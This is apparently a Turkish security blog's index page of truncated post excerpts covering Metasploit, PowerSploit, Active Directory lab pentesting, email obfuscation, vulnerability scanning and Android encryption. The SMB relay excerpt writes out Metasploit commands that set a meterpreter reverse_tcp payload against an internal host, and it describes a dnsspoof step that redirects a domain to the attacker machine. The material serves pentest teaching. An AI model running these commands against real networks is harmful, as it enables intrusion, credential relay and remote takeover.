Blog

Bugünün farkındalığı, Yarının Güvenliğidir.

METASPLOİT

GİRİŞ Görsel. 1. metasploit görseli [1]  Metasploit Framework, güvenlik denetimleri ve penetrasyon testleri için önemli bir araç olarak, farklı dillerde yazılmış exploit’leri bir araya getirerek güçlü bir test platformu oluşturmuştur. Geniş işletim sistemi desteği ve özelleştirilebilir kabuk kodları sayesinde kullanım alanı genişlemiştir. Sistem denetimi, güvenlik açıklarının geliştirilmesi, yama testleri gibi ciddi alanlarda denetmenler, sistem yöneticileri, …

Unattended Installation(Gözetimsiz Kurulumlar)

Unattended Installation (Gözetimsiz Kurulum), bir yazılımın otomatik olarak, kullanıcı müdahalesi olmadan kurulumunu ifade eder. Bu tür kurulumlar, genellikle bir yanıt dosyası (örneğin, unattend.xml) kullanarak gerçekleştirilir. Yanıt dosyası, kurulum sırasında gerekli olan ayarları ve yapılandırmaları önceden tanımlar, böylece kurulum süreci otomatik hale gelir. PowerSploit “PowerSploit, sızma testlerinde tüm aşamalarda test uzmanlarına yardımcı olmak için kullanılabilecek Microsoft …

Smb-Relay saldırısı

msfconsole’u başlatın ve SMB Relay exploit’ini yapılandırın:Komutlar: msfconsole use exploit/windows/smb/smb_relay set SRVHOST 172.16.5.101 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.16.5.101 set SMBHOST 172.16.5.10 exploit Kurbanı, domaindeki herhangi bir ana bilgisayara yapılan her SMB bağlantısında Metasploit sistemimize yönlendirmek için dnsspoof’u yapılandırın: sportsfoo.com alan adındaki tüm alt alan adlarını saldırgan makinemize yönlendiren sahte bir DNS girişiyle bir dosya oluşturun.Komut: echo “172.16.5.101 …

Active Directory Kurulumu ve Penetrasyon Testleri

Herkese merhabalar. Wmware Workstation üzerinden kendi active directory sistemimizi ayaklandırıp penetrasyon testlerini gerçekleştireceğiz. 1-) İlk önce Windows server 2012 R ile ana AD(Active Directory) kurulumunu gerçekleştireceğiz. Domain Controller: Windows-DC Domain: s1ber.com Ardından gerekli kullanıcıları, domain admin, enterprise admin ve gerekli diğer bilgisayarları kuracağız. 2-) Windows server 2016 üzerinden alt alan adı(child domain) kuracağız. Domain controller …

Powershell Active Directory Penetrasyon Testleri

Mevcut kullanıcı ayrıcalıklarını öğrenmek için:whoami /priv whoami /groups whoami /all Get-LocalUser Kullanıcıların adlarını, etkin olup olmadıklarını ve son oturum açma zamanlarını görmek için: Get-LocalUser | ft Name,Enabled,LastLogon net accounts net user administrator Get-LocalGroup Get-LocalGroup | ft Name Get-LocalGroupMember Administrators Bu komutlar, Domain Admins grubunun Administrators grubunun bir üyesi olduğunu gösterir. Domain Admins grubu, genellikle bir …

Web site Mail Güvenliği

1. JavaScript Kullanımı ile E-posta Gizleme E-posta adreslerini doğrudan HTML’de yazmak yerine, JavaScript ile oluşturabilirsiniz. Bu yöntem, temel botları engelleyebilir. 2. CAPTCHA Kullanımı E-posta formlarınızın önüne CAPTCHA koyarak, form doldurulması sırasında botların işlem yapmasını zorlaştırabilirsiniz. 3. E-posta Adreslerini Görsel Olarak Gösterme E-posta adreslerini metin yerine görsel olarak gösterebilirsiniz. Bu yöntem, otomatik tarayıcıların e-posta adreslerini okuyamamasını …

Ağ Güvenliği Zayıflıklarını Sömürmek: Riskler ve Sonuçlar

“Merhaba arkadaşlar, Güvenlik dünyasında önemli bir adım olan güvenlik açığı taramalarını ele alacağımız bu yazıda iç ağın varlık sayımının ne kadar kritik olduğunu vurgulamak istiyorum. Her ne kadar teknik bir konu gibi görünse de, aslında bu adım, sistemlerimizi korumak için atacağımız en temel adımlardan biri. İç ağımızda bulunan varlıkları belirlemek ve hangi sistemlerin güvenlik açıklarına …

Android Kotlin ile Veri Şifreleme ve Güvenlik

Günümüz dijital çağında, kişisel gizlilik ve veri güvenliği giderek daha fazla önem kazanıyor. Her geçen gün, internet üzerinden iletilen ve saklanan hassas bilgilerin gizliliği tehdit altında. Veri güvenliği, sadece bireysel kullanıcılar için değil, aynı zamanda şirketler, kurumlar ve hükümetler için de kritik bir öneme sahiptir. Bu noktada, veri şifreleme, bilgi güvenliği alanında temel bir rol …

18 Milyardan Fazla Hesap Hacklendi! Şimdi hesaplarınızı kontrol etme zamanı !!

Son yıllarda internet güvenliği büyük önem taşıyor. Maalesef, siber saldırılar ve veri ihlalleri giderek artmakta ve pek çok insanın kişisel bilgileri tehlikeye atılmaktadır. Bu tür bir veri ihlali, e-posta hesaplarına yetkisiz erişim sağlamak veya kullanıcı adları gibi hassas bilgilere ulaşmak amacıyla gerçekleştirilen kötü niyetli bir girişimi ifade eder. Son zamanlarda ortaya çıkan büyük ölçekli bir …